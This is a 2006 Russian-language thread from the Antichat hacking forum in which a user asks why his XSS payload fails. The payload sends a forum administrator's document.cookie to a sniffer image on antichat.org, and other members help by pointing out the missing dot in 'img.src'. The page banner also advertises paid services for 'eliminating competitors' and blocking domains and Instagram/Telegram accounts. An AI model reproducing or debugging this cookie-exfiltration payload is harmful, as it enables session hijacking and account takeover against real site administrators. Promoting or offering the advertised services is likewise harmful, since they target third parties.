Форум АНТИЧАТ - Вопрос по организации XSS атаки, на уязвимом форуме..

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Вопрос по организации XSS атаки, на уязвимом форуме..

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос по организации XSS атаки, на уязвимом форуме..

09.07.2006, 10:09

a1nt

Участник форума

Регистрация: 16.12.2005

Сообщений: 146

Провел на форуме:
573934

Репутация: 114

Вопрос по организации XSS атаки, на уязвимом форуме..

Нашел уязвимый форум, где можно вставить

Код:

<script></script>

. Чтобы забрать cookies админа отправил ему сообщение

Код:

<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>

Где картинк - сниффер на antichat.org. Но когда я написал этот код в html и открыл браузером - моя загрузка в лог добавлена не была, только когда напрямую обращаюсь к http://antichat.org/s/a1nt.gif, мой IP добавляется. В чем же все-таки проблема и стоит ли мне ждать админских cookies?

09.07.2006, 11:49

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

Провел на форуме:
5957900

Репутация: 561

Посмотри что у тебя в сорсе сообщения. Может фильтруются символы какие-нибудь.

__________________
Full DNS report

09.07.2006, 19:40

a1nt

Участник форума

Регистрация: 16.12.2005

Сообщений: 146

Провел на форуме:
573934

Репутация: 114

В том то и дело, что уязвимость проверенная. Я не понимаю почему конструкция

Код:

<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>

Не работает на моем компьютере.

09.07.2006, 20:07

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

Провел на форуме:
5605982

Репутация: 523

Цитата:

Цитата:

Найди отличие

09.07.2006, 20:19

Dracula4ever

Постоянный

Регистрация: 08.05.2006

Сообщений: 559

Провел на форуме:
1593567

Репутация: 354

Отправить сообщение для Dracula4ever с помощью ICQ

Отправить сообщение для Dracula4ever с помощью AIM

Отправить сообщение для Dracula4ever с помощью Yahoo

Цитата:

Сообщение от FQziT

Найди отличие

я помогу.

Цитата:

Цитата:

09.07.2006, 20:21

D1mOn

Постоянный

Регистрация: 02.10.2005

Сообщений: 490

Провел на форуме:
2333839

Репутация: 212

Цитата:

точку забыл!

09.07.2006, 20:29

podkashey

Познавший АНТИЧАТ

Регистрация: 18.06.2005

Сообщений: 1,004

Провел на форуме:
2821162

Репутация: 1320

a1nt, это приватная инфа - в паблике нету...

09.07.2006, 20:34

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

Провел на форуме:
5605982

Репутация: 523

dracula4ever, D1mOn: Пять за сообразительность :-)

09.07.2006, 20:58

a1nt

Участник форума

Регистрация: 16.12.2005

Сообщений: 146

Провел на форуме:
573934

Репутация: 114

Епс!! Надо ж так... Ухххх..... Спасибо что ткнули носом, извините за ламеризм.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Proxy FAQ	foreva	Чужие Статьи	12	04.01.2008 12:15
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25
Вопрос по применению XSS на форуме ExBB 1.9.1	TweakeR	Форумы	9	28.02.2006 18:24
ЕсТь ВоПрос	Guma	Чаты	4	26.10.2005 21:48
Вопрос про проведению атаки класса XSS, в форуме Invison Power Board	badboy	Форумы	10	02.06.2005 22:28

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход